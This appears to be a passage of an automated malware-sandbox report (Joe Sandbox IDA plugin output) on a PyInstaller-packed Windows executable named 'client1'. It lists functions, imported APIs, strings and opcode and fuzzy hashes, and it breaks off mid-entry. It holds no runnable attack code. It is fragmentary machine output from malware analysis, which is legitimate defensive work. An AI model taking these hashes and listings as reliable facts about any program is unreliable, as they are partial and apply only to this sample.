Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                    • API String ID: 190572456-3109299426
                                                    • Opcode ID: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                    • Instruction ID: 1569068ba6056d29c4952f7f3de6d42d44f31310c0c16f252f5e785b39ce0af7
                                                    • Opcode Fuzzy Hash: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                    • Instruction Fuzzy Hash: 1E42D864A0DB8391FA75FB34EC801F4A2AFAF44794BD45135C86D462A4EF7CB558C322
                                                    Function 00007FF79F621B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                    • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                    • API String ID: 2446303242-1601438679
                                                    • Opcode ID: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                    • Instruction ID: b9134069d09b4a981dbd7b4c413f77d9912caae64fa4358441e8a9d992f4923f
                                                    • Opcode Fuzzy Hash: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                    • Instruction Fuzzy Hash: 05A17C32208BC196E724AF21E98479EB375F748BA4F904129DB9D43B14DF3DE165CB50
                                                    Function 00007FF79F6431CC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 808467561-2761157908
                                                    • Opcode ID: 46fb5d0366b8e1e712cdd684d815614daf2c7cda5b16cac76ba58e706ef79b66
                                                    • Instruction ID: 5b0ba6a03f5487844e41a113a8b382f86e5846cfd24dccae49d214c9be039ce1
                                                    • Opcode Fuzzy Hash: 46fb5d0366b8e1e712cdd684d815614daf2c7cda5b16cac76ba58e706ef79b66
                                                    • Instruction Fuzzy Hash: 2DB2F572A183C28AE734BE74D4417FDB7AAFB54348F905139DA2D57A88DB38A900DB50
                                                    Function 00007FF79F6274B0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F6274D7
                                                    • FormatMessageW.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F627506
                                                    • WideCharToMultiByte.KERNEL32 ref: 00007FF79F62755C
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                    • API String ID: 2920928814-2573406579
                                                    • Opcode ID: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                    • Instruction ID: 3f8bcb08a4949239cf5d499b2be8be6b3ea2e7926f57f98021b190ace911d838
                                                    • Opcode Fuzzy Hash: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                    • Instruction Fuzzy Hash: 85213E71A18B8282E730BF31EC406E6E26BFB88394FC40135D56D926A4EF7CE145C721
                                                    Function 00007FF79F62B69C Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                    • Instruction ID: d3ee896b1ff875c06ffffb4a6673900127d9fc7f2f0ab2d6f5dccacd6d17444e
                                                    • Opcode Fuzzy Hash: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                    • Instruction Fuzzy Hash: EF312D72609BC196EB70AF70E8803E9B369FB84754F844439DA5D47B95DF38D548C720
                                                    Function 00007FF79F639AE4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                    • Instruction ID: d38e4c0a79f0dbfa6df830ab3b98509657511f2034abe3d7e4a29a7db12c421b
                                                    • Opcode Fuzzy Hash: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                    • Instruction Fuzzy Hash: 8E315E32618B8196EB70AF35E8802EEB3A9FB85764F940135EA9D43B95DF3CD145CB10
                                                    Function 00007FF79F6409B4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 2227656907-0
                                                    • Opcode ID: 1a8060551746b007c23963201f19a9fa9ddec40a19b74045b76b4ab8f762ca91
                                                    • Instruction ID: 572fa503d9efa88cd8877b8e3ca50bbdc41208b686956940698c84aeaa251ad0
                                                    • Opcode Fuzzy Hash: 1a8060551746b007c23963201f19a9fa9ddec40a19b74045b76b4ab8f762ca91
                                                    • Instruction Fuzzy Hash: B2B18222B187E691EA70FB31D4006F9A36AEF45BE4F945131EA6E07B85DE7CE441C720
                                                    Function 00007FF79F642D30 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: memcpy_s
                                                    • String ID:
                                                    • API String ID: 1502251526-0
                                                    • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                    • Instruction ID: 022fd5d2186a9ab477024acba67c667dc67689f6f8d93667fa63fed94a88a2c2
                                                    • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                    • Instruction Fuzzy Hash: 72C1E372B187C687E734BF25A0446AAF796F784B84F948139DB5A47784DB3DE801CB40
                                                    Function 00007FF79F648B68 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise_clrfp
                                                    • String ID:
                                                    • API String ID: 15204871-0
                                                    • Opcode ID: 34bf4ba4d1f77b159a602f4f3a79dc58b46c4397abc6f90fe1b78d3c276b8e03
                                                    • Instruction ID: 23b719426fe3262323a59ac48574ecedfb4a155fac37d97367857c9fd4975837
                                                    • Opcode Fuzzy Hash: 34bf4ba4d1f77b159a602f4f3a79dc58b46c4397abc6f90fe1b78d3c276b8e03
                                                    • Instruction Fuzzy Hash: 3CB18073601B898BEB25EF39C8453A87BE5F784B88F148921DB6D837A4CB39D461C710
                                                    Function 00007FF79F627820 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: b154a429360a9d8fc422caeeb97d2d39407f5ca637504bf6a4efef03296319f0
                                                    • Instruction ID: 932fcd8d92348a72c7866e2f00de7d58b5b134cdeceff497cba42af0b24e2daf
                                                    • Opcode Fuzzy Hash: b154a429360a9d8fc422caeeb97d2d39407f5ca637504bf6a4efef03296319f0
                                                    • Instruction Fuzzy Hash: 92F08122A287C186F770AF70A8847E6B395BB44764F800335D67D466D4DF3CD009CB10
                                                    Function 00007FF79F632C04 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    • API String ID: 0-227171996
                                                    • Opcode ID: 2d8c388a4af4e59f7aa018185c24a80b808f927c20487c79df8fa8b9671cd73b
                                                    • Instruction ID: 7668c5c19a99617fc3ad774d85cbb83818c271b0595d04aaf751ecb236100f5f
                                                    • Opcode Fuzzy Hash: 2d8c388a4af4e59f7aa018185c24a80b808f927c20487c79df8fa8b9671cd73b
                                                    • Instruction Fuzzy Hash: 63E1EA3290878245E778AF3581501BDB3AAFF45BC8F945239DA6E07794CFB9E841C760
                                                    Function 00007FF79F63D098 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: e+000$gfff
                                                    • API String ID: 0-3030954782
                                                    • Opcode ID: e8ad3313ac50deca76865dcff50c63e8317fb702a62c77948e89599ff08dba86
                                                    • Instruction ID: e156f9a67c07404991e2bdfd0b63deb3be7bfcbb7991e7600381fba7b2e9cded
                                                    • Opcode Fuzzy Hash: e8ad3313ac50deca76865dcff50c63e8317fb702a62c77948e89599ff08dba86
                                                    • Instruction Fuzzy Hash: 34518A22B183CA46E730AE35D9017A9F79AF745B94F889231CBB847AC5CEBDE444C710
                                                    Function 00007FF79F63FA08 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                    • String ID:
                                                    • API String ID: 1010374628-0
                                                    • Opcode ID: 3dd89506066c6ffdf0f12fb75a986cd17193a66726dd75fee6c51e450970bbea
                                                    • Instruction ID: b6fa3d6cec1ad3153b5e0c335c4eb541eb43e981ec3e14b56f2c54e8d150c1c8
                                                    • Opcode Fuzzy Hash: 3dd89506066c6ffdf0f12fb75a986cd17193a66726dd75fee6c51e450970bbea
                                                    • Instruction Fuzzy Hash: C0028322A1DBC240FA79BB35A8002F9E69BAF46B90FD44635DD7D473D2DEBDA4114320
                                                    Function 00007FF79F63CC04 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: gfffffff
                                                    • API String ID: 0-1523873471
                                                    • Opcode ID: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                    • Instruction ID: ed79a453b2f738a5480c39dc9fc1f4bc914a7dbf7dda5fdad892c60f8dd03366
                                                    • Opcode Fuzzy Hash: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                    • Instruction Fuzzy Hash: BEA14562B087C646EB31DB39A4007E9BBEAEB51BC4F448132EA6D47795DE7DD401C710
                                                    Function 00007FF79F636F98 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: TMP
                                                    • API String ID: 3215553584-3125297090
                                                    • Opcode ID: a95fe7b9809f20d24c45d18936c36fa2317ccb405fffb6bad0c56651588825d4
                                                    • Instruction ID: 3ad6c9f22a1df78ab2d305707fb9b8024b18f60ee434334d0b6a718378571a7e
                                                    • Opcode Fuzzy Hash: a95fe7b9809f20d24c45d18936c36fa2317ccb405fffb6bad0c56651588825d4
                                                    • Instruction Fuzzy Hash: A7519C52B0C7D251FA74BB3299115FAD29BAF85B84F884434DE3D87792FEBCE4418220
                                                    Function 00007FF79F6425A0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 6aaf01db4fcd6d8e5e92a2165bcca8bef3bc9097c29bcaeff3790f5a52787e5b
                                                    • Instruction ID: 0543b45fef45a71211948fa056022ffdc3d89c87a1eeb38b3e849b6d0a97c198
                                                    • Opcode Fuzzy Hash: 6aaf01db4fcd6d8e5e92a2165bcca8bef3bc9097c29bcaeff3790f5a52787e5b
                                                    • Instruction Fuzzy Hash: 37B09220E07B82E2EA283B326D8225463BE7F48750FD80038C11C41320DF2C30AA5B20
                                                    Function 00007FF79F632800 Relevance: .3, Instructions: 327COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 720b0f885fc535c3a242e303a59ba9c626026de2633fd245c18c7096fc28f432
                                                    • Instruction ID: 4f2cb1bfb659b86488427ecffe0e4e872684de4270b5371fcbc37b964026ac3b
                                                    • Opcode Fuzzy Hash: 720b0f885fc535c3a242e303a59ba9c626026de2633fd245c18c7096fc28f432
                                                    • Instruction Fuzzy Hash: 9FD1EA22A0878646E778EE3584402BDA3AAFF45BD8F944135CE6D076D5CFBDD845C360
                                                    Function 00007FF79F6280A0 Relevance: .3, Instructions: 287COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25b4879d951165098d7d9ad8dfdbe188c5f26750c92d05a39af3c572e9b4c9ce
                                                    • Instruction ID: 47bd37406a4e8c28f45296a6c22469f94633863dc245460102cd532fde25e12c
